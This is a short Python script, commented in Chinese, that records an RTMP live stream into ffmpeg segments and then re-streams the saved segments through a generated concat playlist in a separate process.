# 在 Linux平台 ffmpeg version N-93985-gff2a638-0ubuntu0.16.04.1 Copyright (c) 2000-2019 the FFmpeg developers
# built with gcc 5.4.0 (Ubuntu 5.4.0-6ubuntu1~16.04.11) 20160609
# 上实现有效,其中值 5000000 单位为微妙 即 5s,但是 实际超时时间为 10s
cut_commond = 'ffmpeg -rw_timeout 5000000' \
' -i {pull_address}' \
' -c copy' \
' -flags +global_header' \
' -f segment' \
' -segment_time {seg_time}' \
' -segment_format_options movflags=+faststart' \
' -reset_timestamps 1 {filename}'.format(
pull_address=PULL_ADDR, seg_time=SEG_TIME, filename=TMP_FILE_FOLDER + FILENAME)
push_commond = 'ffmpeg -re -f concat -i {playlist} -c copy -f flv {push_address}'.format(
playlist=TMP_FILE_FOLDER + PLAYLIST, push_address=PUSH_ADDR)
# p = os.system(cut_commond)
# print(p)
def playlist_generator(max_count):
str_list = []
for i in range(0, max_count):
tuple = 'file \'' + FILENAME % i + '\'\n'
str_list.append(tuple)
with open(TMP_FILE_FOLDER + PLAYLIST, 'w') as pl:
pl.writelines(str_list)
def save_rtmp_video():
print("save:gene")
playlist_generator(500)
print("save:start")
p = os.system(cut_commond)
print(p)
def list_rtmp_push():
print("push:start")
os.system(push_commond)
if __name__ == '__main__':
save_process = Process(target=save_rtmp_video)
push_process = Process(target=list_rtmp_push)
save_process.start()
time.sleep(45) # SLEEP 时间至少要大于 30s + seg_time
push_process.start()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.